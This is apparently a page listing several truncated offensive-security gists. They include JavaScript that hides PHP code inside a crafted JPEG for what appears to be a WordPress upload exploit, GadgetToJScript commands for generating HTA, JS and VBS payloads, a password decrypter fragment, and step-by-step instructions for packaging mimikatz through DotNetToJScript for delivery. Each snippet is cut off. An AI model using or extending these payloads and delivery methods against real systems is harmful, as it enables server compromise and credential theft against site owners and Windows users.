This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var wpnonce = ''; | |
var ajaxnonce = ''; | |
var wp_attached_file = ''; | |
var imgurl = ''; | |
var postajaxdata = ''; | |
var post_id = 0; | |
var cmd = '<?php phpinfo();/*'; | |
var cmdlen = cmd.length | |
var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00'.repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06\x07\x07\x06\x08\x0a\x10\x0a\x0a\x09\x09\x0a\x14\x0e\x0f\x0c\x10\x17\x14\x18\x18\x17\x14\x16\x16\x1a\x1d%\x1f\x1a\x1b#\x1c\x16\x16 , #&\x27)*)\x19\x1f-0-(0%()(\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00\x14\x00\x01'+'\x00'.repeat(15)+'\x08\xff\xc4\x00\x14\x10\x01'+'\x00'.repeat(16)+'\xff\xda\x00\x08\x01\x01\x00\x00?\x00T\xbf\xff\xd9'; | |
var img = payload.replace('\x07PAYLOAD', String.fromCharCode(cmdlen) + cmd); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Command to generate HTA code using GadgetsToJScript | |
GadgetToJScript.exe -w hta | |
# Command to generate JS code using GadgetsToJScript | |
GadgetToJScript.exe -w js | |
# Command to generate VBS code using GadgetsToJScript | |
GadgetToJScript.exe -w vbs | |
# Command to generate VBA code using GadgetsToJScript |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import argparse | |
class Decrypter: | |
SIMPLE_STRING = "0123456789ABCDEF" | |
SIMPLE_MAGIC = 0xA3 | |
def __init__(self, password): | |
self.data = password | |
def next(self): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
It is basically a wrap of the following projects: | |
- mimikatz (https://github.com/gentilkiwi/mimikatz) | |
- mimikatz in .NET by Casey Smith (https://gist.github.com/caseysmithrc/87f6572547f633f13a8482a0c91fb7b7) | |
Updated from 2.0.0 to 2.1.1 (https://gist.github.com/pljoel/410eeebcaf118b9ac8b8f2b40fd5e863) | |
- DotNetToJScript (https://github.com/tyranid/DotNetToJScript) | |
INSTRUCTIONS: | |
1. Grab the latest release of mimikatz: https://github.com/gentilkiwi/mimikatz/releases | |
2. a) Uncomment the building lines from Casey's project in Delivery.Program.Main() (You may want to comment the Exec() line though) | |
b) It is going to produce a file.b64, so copy it's content and replace Delivery.Package.file string by it |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package main | |
//#include "dllmain.h" | |
import "C" |